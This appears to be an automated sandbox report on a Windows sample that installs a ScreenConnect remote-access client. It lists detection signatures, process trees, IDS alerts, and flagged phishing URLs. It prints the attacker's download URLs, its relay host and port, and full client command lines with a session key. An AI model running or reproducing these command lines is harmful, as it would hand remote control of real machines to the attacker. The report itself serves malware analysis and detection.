Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
pzPO97QouM.exe

Overview

General Information

Sample name:pzPO97QouM.exe
renamed because original name is a hash value
Original sample name:fe9cb4c7eaa00078639484c209a3acf1d5195cbec55bd7981e733fb179bea899.exe
Analysis ID:1551436
MD5:47891cf8a43a19e066fe70e812982c98
SHA1:b2a6e75ade18f10e2d0cd709630f5e551dbcefae
SHA256:fe9cb4c7eaa00078639484c209a3acf1d5195cbec55bd7981e733fb179bea899
Infos:

Detection

ScreenConnect Tool
Score:57
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:33
Range:0 - 100

Signatures

Antivirus detection for URL or domain
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to hide user accounts
Detected potential unwanted application
Enables network access during safeboot for specific services
Reads the Security eventlog
Reads the System eventlog
AV process strings found (often used to terminate AV products)
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
One or more processes crash
PE file contains an invalid checksum
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

  • System is w10x64
  • pzPO97QouM.exe (PID: 7440 cmdline: "C:\Users\user\Desktop\pzPO97QouM.exe" MD5: 47891CF8A43A19E066FE70E812982C98)
    • dfsvc.exe (PID: 7480 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe" MD5: B4088F44B80D363902E11F897A7BAC09)
      • ScreenConnect.WindowsClient.exe (PID: 3320 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe" MD5: 20AB8141D958A58AADE5E78671A719BF)
        • ScreenConnect.ClientService.exe (PID: 2316 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=pick09y.top&p=8880&s=ff0619b3-cdda-4e74-9760-149d39b5b1c0&k=BgIAAACkAABSU0ExAAgAAAEAAQDdgAKam2Sc4a%2b0vjsNximnzOEX5MKRna0gdqvTZFUYhUi4mxfaIer02WcIARvbkQtcBocnZY6cOhwLXqtjbXCHK5V9NClpcJ0VsmVQ5Ngzm5KWTJOIRLp48Nx7xw8h5tMlI69ZhW7bDoTif1%2bzod8%2bP9ttRfgxJhBbSeiBlGI17JX%2ffgLdQYfBxWOvwJYUSFApm2B6yeRofjh%2b%2fClLGayEdlBZ3CJwK2rKMq6rxdojaIGyxzfrBIlRifETmHax7zLC%2fb3uiIEpoX2rWmOZFQlj%2bubOBd89yKN0uBh3aLVd%2b8orlqSpyEBCOK4rG%2fOuOyVEiCOkqxdA0LWuzW70luvi&r=&i=Untitled%20Session" "1" MD5: 361BCC2CB78C75DD6F583AF81834E447)
    • WerFault.exe (PID: 7656 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7440 -s 756 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 7576 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 7616 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 7440 -ip 7440 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 7724 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7856 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • ScreenConnect.ClientService.exe (PID: 528 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=pick09y.top&p=8880&s=ff0619b3-cdda-4e74-9760-149d39b5b1c0&k=BgIAAACkAABSU0ExAAgAAAEAAQDdgAKam2Sc4a%2b0vjsNximnzOEX5MKRna0gdqvTZFUYhUi4mxfaIer02WcIARvbkQtcBocnZY6cOhwLXqtjbXCHK5V9NClpcJ0VsmVQ5Ngzm5KWTJOIRLp48Nx7xw8h5tMlI69ZhW7bDoTif1%2bzod8%2bP9ttRfgxJhBbSeiBlGI17JX%2ffgLdQYfBxWOvwJYUSFApm2B6yeRofjh%2b%2fClLGayEdlBZ3CJwK2rKMq6rxdojaIGyxzfrBIlRifETmHax7zLC%2fb3uiIEpoX2rWmOZFQlj%2bubOBd89yKN0uBh3aLVd%2b8orlqSpyEBCOK4rG%2fOuOyVEiCOkqxdA0LWuzW70luvi&r=&i=Untitled%20Session" "1" MD5: 361BCC2CB78C75DD6F583AF81834E447)
    • ScreenConnect.WindowsClient.exe (PID: 4904 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe" "RunRole" "52c6258f-85a1-42d1-9479-cad4b97013ae" "User" MD5: 20AB8141D958A58AADE5E78671A719BF)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
    C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
      SourceRuleDescriptionAuthorStrings
      00000001.00000002.2234906229.000001674E2A1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
        0000000A.00000000.1751431344.0000000000972000.00000002.00000001.01000000.0000000C.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
          0000000A.00000002.1768380030.0000000002D10000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
            Process Memory Space: dfsvc.exe PID: 7480JoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
              Process Memory Space: ScreenConnect.WindowsClient.exe PID: 3320JoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                Click to see the 1 entries
                SourceRuleDescriptionAuthorStrings
                10.0.ScreenConnect.WindowsClient.exe.970000.0.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security

                  System Summary

                  barindex
                  Source: Network ConnectionAuthor: Nasreddine Bencherchali (Nextron Systems): Data: DesusertionIp: 192.168.2.9, DesusertionIsIpv6: false, DesusertionPort: 49727, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Initiated: true, ProcessId: 7480, Protocol: tcp, SourceIp: 104.21.96.148, SourceIsIpv6: false, SourcePort: 443
                  Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 7576, ProcessName: svchost.exe
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-07T17:56:09.240998+010020229301A Network Trojan was detected4.175.87.197443192.168.2.949819TCP
                  2024-11-07T17:56:47.202370+010020229301A Network Trojan was detected4.175.87.197443192.168.2.950001TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-07T17:56:05.088725+010020098971A Network Trojan was detected104.21.96.148443192.168.2.949795TCP
                  2024-11-07T17:56:06.805502+010020098971A Network Trojan was detected104.21.96.148443192.168.2.949806TCP
                  2024-11-07T17:56:13.053677+010020098971A Network Trojan was detected104.21.96.148443192.168.2.949840TCP
                  2024-11-07T17:56:15.654543+010020098971A Network Trojan was detected104.21.96.148443192.168.2.949851TCP
                  2024-11-07T17:56:18.231443+010020098971A Network Trojan was detected104.21.96.148443192.168.2.949872TCP
                  2024-11-07T17:56:19.784500+010020098971A Network Trojan was detected104.21.96.148443192.168.2.949879TCP
                  2024-11-07T17:56:24.162269+010020098971A Network Trojan was detected104.21.96.148443192.168.2.949900TCP
                  2024-11-07T17:56:28.361341+010020098971A Network Trojan was detected104.21.96.148443192.168.2.949925TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: https://molatoriism.icu/Bin/ScreenConnect.WindowsFileManager.exeAvira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.WindAvira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.Avira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.Client.applicationplicatAvira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.Client.application01bAvira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.WindowsClient.exe.configAvira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.WindowsFileManager.exe.config0jAvira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.Core.dllAvira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.Client.applicationUZAvira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.WindowsBackstageShell.exeR61fRAvira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.Client.Avira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.Client.application04lAvira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.Client.applicationSAvira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.Client.applicationXAvira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.WindowsClient.exeAvira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.WindowsClient.exe6fffiAvira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.Client.applicationxUAvira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.configRiAvira URL Cloud: Label: phishing
                  Source: https://molatoriism.icuAvira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.Client.applicationtAvira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.Client.application089Avira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=pick09y.top&p=8880&Avira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.Client.application08904lAvira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.Client.application17Avira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.ClientService.exeAvira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.WindowsFileManager.exel7Avira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.applicationAvira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.Core.dllFAvira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.Client.application04Avira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.Client.dllAvira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.Windows.dllAvira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.WindowsFileManager.exeL6#f4Avira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.ClientSeAvira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.Client.applicationZ.L04re=Avira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.ClientService.exePAvira URL Cloud: Label: phishing
                  Source: https://molatoriism.icu/Bin/ScreenConnect.WindowsBackstageShell.exeAvira URL Cloud: Label: phishing
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 85.2% probability
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeCode function: 0_2_009C1000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_009C1000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exeJump to behavior

                  Compliance

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exeJump to behavior
                  Source: pzPO97QouM.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: pzPO97QouM.exeStatic PE information: certificate valid
                  Source: unknownHTTPS traffic detected: 104.21.96.148:443 -> 192.168.2.9:49727 version: TLS 1.2
                  Source: pzPO97QouM.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: dfsvc.exe, 00000001.00000002.2234906229.000001674E443000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674E17B000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1768258678.0000000002C02000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: pzPO97QouM.exe
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.2234906229.000001674E443000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674E671000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674E177000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.1764722786.0000000002F42000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.2595768885.0000000000D20000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.2596143693.0000000002711000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1751431344.0000000000972000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000000B.00000000.1756054618.000000000044D000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.2234906229.000001674E443000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674E536000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674E193000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1769693267.000000001BC32000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.1751431344.0000000000972000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: dfsvc.exe, 00000001.00000002.2234906229.000001674E443000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674E536000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674E193000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1769693267.000000001BC32000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.2234906229.000001674E443000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674E17B000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1768258678.0000000002C02000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.2234906229.000001674E443000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674E350000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2234906229.000001674DFC5000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.1765477512.0000000005582000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeCode function: 0_2_009C4A4B FindFirstFileExA,0_2_009C4A4B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\Jump to behavior

                  Networking

                  barindex
                  Source: C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeRegistry value created: NULL Service
                  Source: global trafficTCP traffic: 192.168.2.9:49968 -> 62.182.85.100:8880
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=pick09y.top&p=8880&s=ff0619b3-cdda-4e74-9760-149d39b5b1c0&k=BgIAAACkAABSU0ExAAgAAAEAAQDdgAKam2Sc4a%2b0vjsNximnzOEX5MKRna0gdqvTZFUYhUi4mxfaIer02WcIARvbkQtcBocnZY6cOhwLXqtjbXCHK5V9NClpcJ0VsmVQ5Ngzm5KWTJOIRLp48Nx7xw8h5tMlI69ZhW7bDoTif1%2bzod8%2bP9ttRfgxJhBbSeiBlGI17JX%2ffgLdQYfBxWOvwJYUSFApm2B6yeRofjh%2b%2fClLGayEdlBZ3CJwK2rKMq6rxdojaIGyxzfrBIlRifETmHax7zLC%2fb3uiIEpoX2rWmOZFQlj%2bubOBd89yKN0uBh3aLVd%2b8orlqSpyEBCOK4rG%2fOuOyVEiCOkqxdA0LWuzW70luvi&r=&i=Untitled%20Session HTTP/1.1Host: molatoriism.icuAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: molatoriism.icuAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: molatoriism.icuAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: molatoriism.icuAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: molatoriism.icuAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: molatoriism.icuAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: molatoriism.icuAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: molatoriism.icuAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: molatoriism.icuAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: molatoriism.icuAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: molatoriism.icuAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: molatoriism.icuAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: molatoriism.icuAccept-Encoding: gzipConnection: Keep-Alive
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 104.21.96.148:443 -> 192.168.2.9:49795
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 104.21.96.148:443 -> 192.168.2.9:49806
                  Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.9:49819
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 104.21.96.148:443 -> 192.168.2.9:49879
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 104.21.96.148:443 -> 192.168.2.9:49840
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 104.21.96.148:443 -> 192.168.2.9:49872
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 104.21.96.148:443 -> 192.168.2.9:49851
